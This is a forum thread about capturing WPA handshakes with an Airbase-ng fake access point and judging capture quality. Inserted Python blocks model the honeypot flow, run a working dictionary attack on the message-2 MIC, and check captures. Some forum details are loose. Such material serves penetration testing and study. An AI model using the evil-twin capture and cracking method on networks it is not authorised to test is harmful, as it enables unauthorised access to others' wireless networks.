
Airbase WPA Capture Fail


Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Sat, 30 Nov 2013 @ 18:42:54

Does anyone here use Airbase? I thought I should mention this here in case some of you are working on captures using Airbase and wondering why you cannot break them.

I have spent some time experimenting with it to capture a WPA handshake and have just come to the conclusion that it doesn't work as expected.

As far as I knew, Airbase could be used to capture a WPA handshake from a client even when the AP was out of range.

So today I turned off my AP and set up Airbase with the same MAC, ESSID, Crypto type and channel as my normal AP.

I then set Airbase running and also Airodump and used my laptop to connect to it. Airodump captured the handshake and I was overjoyed.

I thought just how useful this could be for those difficult to reach penetration testing jobs.

For some reason I decided to see the process through to the end just to make sure everything was ok. I converted the .cap to hccap and used oclhashcat to break it. I made certain my WPA password was in the list.

Well you can probably guess the rest, I couldn't break it even with my wifi password in the list.

So is this normal? Have I misunderstood what Airbase was supposed to do?

Is there any other method for capturing a genuine handshake from a client when the AP is absent?

Thanks.


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Reputation: 307 Reputation
Sat, 30 Nov 2013 @ 21:22:34

Unfortunately I cannot help. I have never used Airbase-ng or set up a fake AP. But I can give you some tips and some background information if you wish.

Hash-IT said:

So today I turned off my AP and set up Airbase with the same MAC, ESSID, Crypto type and channel as my normal AP.


You don't need to use the same MAC and the same channel. Just the ESSID and encryption are enough. If you don't know the encryption then you can set up an AP for every encryption type you want (Open, WEP, WPA, WPA2...).

Hash-IT said:

I then set Airbase running and also Airodump and used my laptop to connect to it. Airodump captured the handshake and I was overjoyed


I don't know if you are supposed to use airodump-ng to do this.

Hash-IT said:

For some reason I decided to see the process through to the end just to make sure everything was ok. I converted the .cap to hccap and used oclhashcat to break it. I made certain my WPA password was in the list.


I'm glad you did it and didn't take it for granted that it would have worked. It's part of the learning process. Just for testing, try to run Aircrack-ng on your CAP. Don't convert it to HCCAP and then use Hashcat.

Hash-IT said:

So is this normal ? Have I misunderstood what Airbase was supposed to do ?


You can definitely do it with Airbase-ng. Search on the net for 'honeypot'. There should be some tutorials.

Hash-IT said:

Is there any other method for capturing a genuine handshake from a client when the AP is absent ?


Nope. The whole process is based on the fake AP and the client authentication. I can write up a minimal... let's say proof of concept of why this works (or should be working).


Hash-IT
Sat, 30 Nov 2013 @ 21:54:35

Hi hash-ire, thanks for your help.

I tried just using Aircrack on the .cap before converting it, same result.

I found this which suggests using Airodump to capture the handshake with Airbase.

http://www.aircrack-ng.org/doku.php?id=airbase-ng

Thinking about it, I am not sure how we can establish a proper handshake when the AP doesn't know the PSK. Unless it is only the client who has to prove they have the PSK.

Actually I think that is it: the handshake is only to establish a connection, the rest is encrypted locally using the PSK. If one of the two (client or AP) does not know the PSK then things will go no further.

Hmm... So I wonder why I could not break a known PSK in my test?

Very much looking forward to your reply hash-ire.



Hash-IT
Sat, 30 Nov 2013 @ 22:02:30

I hope you can find this thread, hash-ire; I moved it to a more appropriate section. I will give myself a -1, LOL.



Hash-IT
Sat, 30 Nov 2013 @ 22:24:38

Oh now this is interesting.

IT WORKS !

I was using an old wifi dongle on Kali earlier, an old Belkin one. I have just tried my Alpha dongle and tried again and it all works OK!

This is worrying, as airodump said I had a complete capture when I clearly hadn't.

If this was "in the wild" I would have never known that the .cap was unbreakable even if I did have the password.

I wish there was a way to know for certain if I have a good capture before using oclhashcat.

I hope I haven't wasted too much of your time, hash-ire.



hash-ire
Sun, 01 Dec 2013 @ 13:50:08

Here's a bit of background:

When you connect to a network, settings like the ESSID, the key and the encryption are cached and stored on your device. That's why when you simply turn on your wifi it automatically connects to the network. That's pretty convenient since you don't need to manually enter the password every time the wireless disconnects and reconnects. Disconnections are really frequent in wifi, e.g. when you move, when there are multiple APs or because of interference.

The interesting part is that when you turn on the wifi or when there are no networks nearby, the client automatically sends probe requests into the air. You can see them when you are sniffing the air with airodump-ng (in the lower part, where it says 'not associated'). The client is simply searching for APs it has previously been connected to.
Basically a probe request from a client is something saying: 'is there an AP around which I have been connected to previously? If YES, say HI!', so that it can connect. So every probe request shows to anyone every ESSID of the networks you have ever been connected to.

What a malicious user can do (yes, it's you) is to set up a fake access point, called a honeypot (you can easily guess why), with the same ESSID as a network your victim client has been connected to. Of course you need to use the same encryption algorithm (Open, WEP, WPA, WPA2...), but you can just set up a bunch of different APs with the same ESSID but with different encryption types. In fact the probe request packet does not contain information about the encryption type itself.

NOTE: you can create multiple monitor mode interfaces on the same physical card, even on different channels. The card will automatically multiplex between the different channels. It's called TDM (Time Division Multiplexing).
Let's look at the 4-way handshake again to understand whether it's possible to do what we claim.

We have:
- ANonce (random value)
- SNonce + MIC (MIC is like a signature algorithm)
- Key installation
- Key ACK

There are 4 packets in the 4-way handshake.
- packets 1 and 3 both contain the ANonce
- packets 2 and 4 both contain the SNonce

The nonce value in the other 2 packets (3 and 4) only means they belong to the same handshake.

The encryption process is made in this way:
passphrase (8-63) -> PBKDF2(SSID) -> Pre-shared key 256 bit -> 4-way handshake (ANonce, SNonce, AP MAC, Client MAC) -> PTK -> MIC (used to verify if the password matches).

As we have a fake AP we don't know the Pre-Shared Key (256 bit).

Basically the process takes place as follows:
- The victim client sees your AP and associates to it.
- Then the fake AP sends the client the ANonce (message 1), which is just a large random number. Anybody can do that; you don't need the key.

Now there's no way for the client to know that your AP is not the real one.

- So the client sends you message 2 with SNonce + MIC

At this point, as we don't have the key, we cannot validate the connection. So what we do is drop the connection: we de-authenticate the client.

So what we have now is:
- ANonce (we generated it)
- SNonce
- the AP MAC (of course)
- the client MAC

So what are we doing now? The dictionary attack! We have all the information we need.
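
The derivation hash-ire sketches above (passphrase -> PBKDF2 -> PMK -> PTK -> MIC), carried through end to end as an added example. This is not code from the thread, from Airbase-ng or from oclhashcat; it is a small Python model of the WPA2/CCMP case. The fake AP picks its own ANonce and builds message 1 without ever touching the PSK; the client, which does know the passphrase, derives the PTK and signs message 2; the attacker then brute-forces that MIC with nothing more than the SSID, both MACs, the ANonce and the captured message 2. The MACs, SSID, passphrase and wordlist are constructed; the only real-world value is the PBKDF2 test vector from the 802.11i standard ("password" / "IEEE") used as a self-check.

```python
"""Added example (not from the thread or aircrack-ng): a fake AP without the PSK
still yields a crackable WPA2 message 2.  All MACs, the SSID, the passphrase and
the wordlist below are constructed for illustration."""
import hashlib
import hmac
import os
import struct

# EAPOL-Key "Key Information" flags (IEEE 802.11i).  Version 2 = HMAC-SHA1-128 MIC (CCMP).
KEY_INFO_VERSION_AES = 0x0002
KEY_INFO_PAIRWISE = 0x0008
KEY_INFO_ACK = 0x0080
KEY_INFO_MIC = 0x0100
NONCE_OFFSET = 17   # 4-byte 802.1X header + 13 bytes of Key Descriptor before the nonce
MIC_OFFSET = 81     # 4-byte 802.1X header + 77 bytes of Key Descriptor before the MIC
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP / PSK RSN element


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]  # KCK = PTK[0:16] signs the EAPOL frames; KEK and TK follow


def build_eapol_key(key_info, replay_counter, nonce, mic=b"\x00" * 16, key_data=b""):
    """Minimal EAPOL-Key frame: 802.1X header + RSN Key Descriptor."""
    body = struct.pack(">BHHQ32s16s8s8s16sH", 2, key_info, 16, replay_counter, nonce,
                       b"\x00" * 16, b"\x00" * 8, b"\x00" * 8, mic, len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body


def eapol_mic(kck, frame):
    """WPA2/CCMP MIC: HMAC-SHA1 over the frame with its MIC field zeroed, truncated to 16 bytes
    (WPA/TKIP, descriptor version 1, uses HMAC-MD5 instead)."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def client_message2(passphrase, ssid, aa, spa, anonce, snonce, replay_counter):
    """What the victim station does on receiving message 1: derive the PTK and sign message 2.
    This is the only step that needs the passphrase, and it happens on the client."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    m2 = build_eapol_key(KEY_INFO_VERSION_AES | KEY_INFO_PAIRWISE | KEY_INFO_MIC,
                         replay_counter, snonce, key_data=RSN_IE)
    return m2[:MIC_OFFSET] + eapol_mic(kck, m2) + m2[MIC_OFFSET + 16:]


def crack(ssid, aa, spa, anonce, m2_frame, wordlist):
    """Dictionary attack using only the SSID, both MACs, the ANonce and the captured message 2."""
    snonce = m2_frame[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = m2_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, m2_frame), captured_mic):
            return candidate
    return None


def simulate_fake_ap(passphrase, ssid, wordlist, anonce=None, snonce=None):
    """Honeypot flow: the fake AP invents an ANonce, the real client answers with a
    valid message 2, the AP deauthenticates and the attacker goes straight to cracking."""
    aa = bytes.fromhex("00112233aabb")    # fake AP BSSID (constructed)
    spa = bytes.fromhex("66778899ccdd")   # victim station MAC (constructed)
    anonce = anonce or os.urandom(32)     # chosen by us; no PSK needed for message 1
    snonce = snonce or os.urandom(32)     # chosen by the client
    m1 = build_eapol_key(KEY_INFO_VERSION_AES | KEY_INFO_PAIRWISE | KEY_INFO_ACK, 1, anonce)
    m2 = client_message2(passphrase, ssid, aa, spa, m1[NONCE_OFFSET:NONCE_OFFSET + 32], snonce, 1)
    # messages 3 and 4 never happen: without the PMK we cannot produce a valid message 3
    return crack(ssid, aa, spa, anonce, m2, wordlist)


if __name__ == "__main__":
    # PBKDF2 test vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE"
    assert pmk_from_passphrase("password", "IEEE").hex().startswith("f42c6fc52df0ebef")
    print(simulate_fake_ap("correct horse", "TestNet", ["password", "letmein", "correct horse"]))
```

The point to notice is where the passphrase is used: only inside `client_message2`. The fake AP's side (`build_eapol_key` for message 1 and `crack`) never needs it, which is exactly why a honeypot with nothing but the right ESSID and cipher suite still produces a crackable capture.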


Hash-IT
Sun, 01 Dec 2013 @ 13:54:49

Thank you VERY much for this hash-ire !! I have copied and saved your excellent post ! +1

hash-ire said:

What a malicious user can do (yes, it's you)

Cheeky !!



hash-ire
Sun, 01 Dec 2013 @ 13:59:00

I'll write something about good handshakes in my next post. Most of my writing will be about my thoughts, as I don't have complete knowledge of these subjects.

Stay tuned.


Hash-IT
Sun, 01 Dec 2013 @ 14:04:50

hash-ire said:

I'll write something about good handshakes in my next post. Most of my writing will be about my thoughts, as I don't have complete knowledge of these subjects.

Stay tuned.


Your posts "or thoughts" as you call them are so good I think you should have your own tutorial section on here.

It seems a waste hiding your posts in my threads; I think you should start a series of your own threads.

If you write them out I will make them sticky in this section.

Awesome work and thank you very much.



hash-ire
Fri, 06 Dec 2013 @ 20:57:44

Hash-IT said:

Your posts "or thoughts" as you call them are so good I think you should have your own tutorial section on here.

It seems a waste hiding your posts in my threads; I think you should start a series of your own threads.

If you write them out I will make them sticky in this section.

Awesome work and thank you very much.


Thank you. The time will probably come. It's also easier for me to remember things when they're written. But I'm pretty busy at the moment, so I don't know when I'll do that.


hash-ire
Fri, 06 Dec 2013 @ 21:03:53

At long last, the talk about good handshakes.
As I said in my other post, in order to crack a handshake you actually need the first 2 packets of the process: message 1 and message 2.
Message 1:
- ANonce (Access point Nonce)
Message 2:
- SNonce (Station Nonce)
- Michael Key (MIC)
Here's a good cleaned capture file. I know for sure it's good because I have managed to break it. For the cleaning I used wpaclean, a tool which is already installed in the Backtrack and Kali distros.

As we can see we have message 1 and 2 and a beacon frame. Why a beacon frame? Because the ESSID of the network is involved in the process too. It is used like a salt, basically. That's why rainbow tables exist for specific ESSIDs.
So, tools like wpaclean will retain a beacon frame from the capture matching the ESSID/BSSID from the 4-way handshake packets.
Now let's take a look at how a good handshake should look (in appearance) using Wireshark.

We have the first message with the nonce (it is intended to be the ANonce). There's no MIC: the field is filled with zeroes.

Here, in the second message, we have the other nonce (SNonce) and the Michael Key.
Apparently it's good. We have all the data we needed.
Now, before I go on with this, the funny part. The following capture file I'll show you is a handshake I tried to break for many hours. Then, while making this tutorial, I decided 'to take a look inside it' and... disappointment! It is a bad capture indeed.

This is the cleaned file. We have message 2 and...? Well, that's not what I expected. It's not very promising, is it? Let's take a look more in depth at the full capture file (not the cleaned one). By using the 'eapol' filter we can display the packets related to the authentication process.

The highlighted packet doesn't have an indication which specifies its role in the 4-way handshake. There's no (Message * of *). So I saw the nonce and the MIC and I thought it had to be the second message. Moreover, it is between other second messages. The problem is that the packet is sent from the Netgear (the AP) to the Samsung device (the client). So it can't be.

Let's look at message 2/4. Now we know for sure it is the second message but... what? The nonce value is zero?
The conclusion:
I admit this is really a bad handshake. It's not complete (the majority of the fields make no sense to me) and between message 1 and message 2 there's an enormous gap in the sequence numbers.

The purpose of all this was to prove that bad handshakes DO indeed exist. The one above was sniffed by me in a 'real session'. There was no intention of making it noisy, though the RX signal wasn't really strong.
Aircrack-ng sees it as 'good'. Same thing for wpaclean.
But, let's keep talking.

At this point, while looking from packet to packet, I noticed there wasn't any sort of identifier between the authentication sessions. In order to get the handshake you may have tried disconnecting a client multiple times. This may involve capturing the first two messages (1 and 2) multiple times, but for different sessions. How can you match together messages from the same session and know you're doing it? Well, apparently you can't.

After all my experiments I read this article: http://www.exploresecurity.com/william-wpawpa2-4-way-handshake-extraction-script/. You may want to read it too. It's even in the hashcat wiki.

I close this talk here for now. There are probably tons of grammatical errors in this post. Bear with me, I'm pretty tired tonight.
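
The checks hash-ire makes by eye in Wireshark above (is there a message 1 from the AP with a nonce and a zero MIC field, a message 2 from the station with a non-zero SNonce and a MIC, and do the two belong together?), written as an added example in Python. This is not the thread's code and not what aircrack-ng or wpaclean do internally. It also uses one field the post does not mention: the EAPOL-Key replay counter. 802.11i requires message 2 to echo the replay counter of the message 1 it answers, so when a client has been deauthenticated several times and the capture holds several partial attempts, matching replay counters is what pairs a message 2 with its own message 1. The frames, MACs, nonces and the MIC value are all constructed; the "bad" capture imitates the one described in the post (a MIC-bearing frame sent by the AP, a message 2 with a zero nonce, and a message 1 that nothing answers).

```python
"""Added example (not from the thread, aircrack-ng or wpaclean): check that a capture
holds a usable message 1 / message 2 pair before spending GPU time on it.
Frames, MACs, nonces and the MIC below are constructed for illustration."""
import struct

# EAPOL-Key "Key Information" flags (IEEE 802.11i)
PAIRWISE, INSTALL, ACK, MIC, SECURE = 0x0008, 0x0040, 0x0080, 0x0100, 0x0200
M1_INFO = 0x0002 | PAIRWISE | ACK   # AP -> STA: ANonce, MIC field zero
M2_INFO = 0x0002 | PAIRWISE | MIC   # STA -> AP: SNonce, MIC, RSN IE in Key Data
ZERO_NONCE, ZERO_MIC = b"\x00" * 32, b"\x00" * 16


def eapol_key(key_info, replay, nonce, mic=ZERO_MIC, key_data=b""):
    """Build a minimal EAPOL-Key frame (802.1X header + RSN Key Descriptor)."""
    body = struct.pack(">BHHQ32s16s8s8s16sH", 2, key_info, 16, replay, nonce,
                       b"\x00" * 16, b"\x00" * 8, b"\x00" * 8, mic, len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body


def parse_eapol_key(frame):
    """Pull out the fields that decide whether a frame is worth anything."""
    _, ptype, length = struct.unpack(">BBH", frame[:4])
    if ptype != 3 or length < 95 or len(frame) < 99:
        raise ValueError("not a complete EAPOL-Key frame")
    f = struct.unpack(">BHHQ32s16s8s8s16sH", frame[4:99])
    return {"key_info": f[1], "replay": f[3], "nonce": f[4], "mic": f[8], "key_data_len": f[9]}


def message_number(key):
    """Classify a frame as message 1..4 from its flags (what Wireshark shows as 'Message N of 4')."""
    ki = key["key_info"]
    if not ki & PAIRWISE:
        return None                          # group key handshake, useless for PSK cracking
    if ki & ACK:
        return 3 if ki & MIC else 1          # only the AP sets Ack
    if not ki & MIC:
        return None                          # a station frame without a MIC fits no message
    return 4 if (ki & SECURE or key["key_data_len"] == 0) else 2


def audit(frames, bssid):
    """frames: (src_mac, dst_mac, eapol_bytes) tuples in capture order.
    Returns (pair, problems): indices of the first usable (M1, M2) pair or None, plus findings."""
    problems, parsed = [], []
    for i, (src, dst, raw) in enumerate(frames):
        key = parse_eapol_key(raw)
        n = message_number(key)
        if n is None:
            problems.append(f"frame {i}: key_info 0x{key['key_info']:04x} is no 4-way handshake message")
        if n in (1, 3) and src != bssid:
            problems.append(f"frame {i}: message {n} must come from the AP, src is {src.hex()}")
        if n in (2, 4) and (src == bssid or dst != bssid):
            problems.append(f"frame {i}: message {n} must go from the station to the AP")
        if n in (1, 2) and key["nonce"] == ZERO_NONCE:
            problems.append(f"frame {i}: message {n} carries an all-zero nonce")
        if n == 1 and key["mic"] != ZERO_MIC:
            problems.append(f"frame {i}: message 1 should carry a zero MIC field")
        if n == 2 and key["mic"] == ZERO_MIC:
            problems.append(f"frame {i}: message 2 without a MIC gives nothing to crack against")
        parsed.append((n, src, dst, key))
    # message 2 must echo the replay counter of the message 1 it answers
    for i, (n1, s1, _, k1) in enumerate(parsed):
        if n1 != 1 or s1 != bssid or k1["nonce"] == ZERO_NONCE:
            continue
        for j in range(i + 1, len(parsed)):
            n2, s2, d2, k2 = parsed[j]
            if (n2 == 2 and s2 != bssid and d2 == bssid and k2["replay"] == k1["replay"]
                    and k2["nonce"] != ZERO_NONCE and k2["mic"] != ZERO_MIC):
                return (i, j), problems
    problems.append("no message 1 / message 2 pair with a matching replay counter: not crackable")
    return None, problems


# Constructed sample data
AP, STA = bytes.fromhex("a0b1c2000001"), bytes.fromhex("d4e5f6000002")
ANONCE, SNONCE = bytes(range(1, 33)), bytes(range(33, 65))
FAKE_MIC = b"\x5a" * 16
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP / PSK


def good_capture():
    return [(AP, STA, eapol_key(M1_INFO, 1, ANONCE)),
            (STA, AP, eapol_key(M2_INFO, 1, SNONCE, FAKE_MIC, RSN_IE))]


def bad_capture():
    """Imitates the broken capture from the post: a MIC-bearing frame sent by the AP,
    a message 2 whose SNonce is zero, and a message 1 whose replay counter nothing answers."""
    return [(AP, STA, eapol_key(M2_INFO, 5, ANONCE, FAKE_MIC, RSN_IE)),
            (STA, AP, eapol_key(M2_INFO, 7, ZERO_NONCE, FAKE_MIC, RSN_IE)),
            (AP, STA, eapol_key(M1_INFO, 1, ANONCE))]


if __name__ == "__main__":
    for name, cap in (("good", good_capture()), ("bad", bad_capture())):
        pair, problems = audit(cap, AP)
        print(name, "->", pair)
        for p in problems:
            print("  ", p)
```

On a real capture the three tuple fields would come from the 802.11 data frames carrying EAPOL (addr2 is the sender, addr1 the receiver, and the EAPOL payload follows the LLC/SNAP header), and a frame that fails any of these checks is exactly the kind of "complete" capture that airodump-ng will still announce and oclhashcat will never break.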


Hash-IT
Sat, 07 Dec 2013 @ 18:28:26

Yet again another great post, hash-ire.

When you get time to write them up as a tutorial rather than as a reply to me, please contact me via PM and let's see about making these a sticky tutorial section.

I have only one small comment about the above: wpaclean has always caused me more trouble than it was worth. As far as I know, others have had issues with it also.

Thanks


